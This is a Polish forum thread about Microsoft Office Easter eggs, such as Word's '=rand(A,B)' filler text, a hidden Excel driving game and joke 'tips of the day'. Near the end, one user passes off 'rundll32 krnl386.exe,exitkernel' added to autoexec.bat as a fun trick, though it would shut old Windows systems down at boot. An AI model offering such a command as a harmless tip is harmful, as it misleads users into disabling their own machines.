Jak ktoś użytkuje jeszcze microsoft worda, to polecam wpisać ”=rand(A,B)”
Gdzie A oznacza liczbę wierszy, a B oznacza liczba wyświetleń w wierszu, stare ale fajne.
Jak ktoś użytkuje jeszcze microsoft worda, to polecam wpisać ”=rand(A,B)”
Gdzie A oznacza liczbę wierszy, a B oznacza liczba wyświetleń w wierszu, stare ale fajne.
"dobrzy hakerzy są sławni na cały świat, ale o hakerach geniuszach nikt nic nie wie."
Hihi - jak ktoś urzywa wogole jeszcze windowsa
ogólnie takich "niedokumentowanych opcji" to w officu jest wiecej - np. jest bardzo fajna gra w excelu - jezdzi sie samochodzikiem - po ulicy na której wypisane są credits'y - w google tez jest pisanka na cześć doktołka z kłułika baksa - i wszędzie tam gdzie jest r (dla przypomnienia ester - czy jak mu tam zamiast r mówuł ł) jest własnie jego imie - ogólnie w ciul tego jest
jak bym tyle czasu pisał jakiś durny program to tez bym sie na chwile chciał oderwac i rozkminić sobie coś śmiesznego - tak własnie powstają pisanki
ps. Chyba powinieneś zmienić temat na "Pisanki" a modelator to w oftopic wrzucić - można by sobie tak popisac co sie zna - ja swoje opisze później krok po kroku
pozdrawiam
Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )
jak będziesz miął chwile to możesz opisać to z exela no i to z google.
"dobrzy hakerzy są sławni na cały świat, ale o hakerach geniuszach nikt nic nie wie."
=rand(a,b) jest znane :-)
W Windows 3.1 (wow! kto pamieta te czasy!!!) bylo w Wrodzie 6.0 jeszcze takie cudo jak porady dnia :-) no i zabawa polegala na tym, ze niektore byly powalajace... pamietam 2 lub 3 - w sumie bylo 6 albo 7...
- Czy wiesz ze biegajac z siekiera w reku mozesz sie skaleczyc?
- Skakanie na glowke do pustego basenu nie wychodzi na zdrowie.
- Pasiasta koszula raczej nie pasuje do spodni w krate
...
jak sobie przypomne to zrobie edit... moze nawet znajde screenshot'y z tego :-) bo gdzies powinienem miec...
W sumie porady były nawet praktyczne chociaż trochę kuriozalne.
kosiarz gdzie ja mam wpisac te ”=rand(A,B)” ? w wordzie czy w excelu? dziala to czy to tylko taka sciema?
Nie widziszKod:Jak ktoś użytkuje jeszcze microsoft worda (...)
ktos jednak uzywa (np ja)
ironwall ja znam fajna żecz sepcjalnie dla ciebie
rundll32 krnl386.exe,exitkernel
dopisz to autoexec.bat
efekt jest wyebisty
pamientaj wszystko co robisz robisz na własna odpowiedzalnosc
Ostatnio edytowane przez Sardihan : 01-27-2007 - 17:16
Word wpisz =rand(12,34) potem enter
fajne to kosiarz. znasz jeszce jakies takie sztuczki? jak tak napisz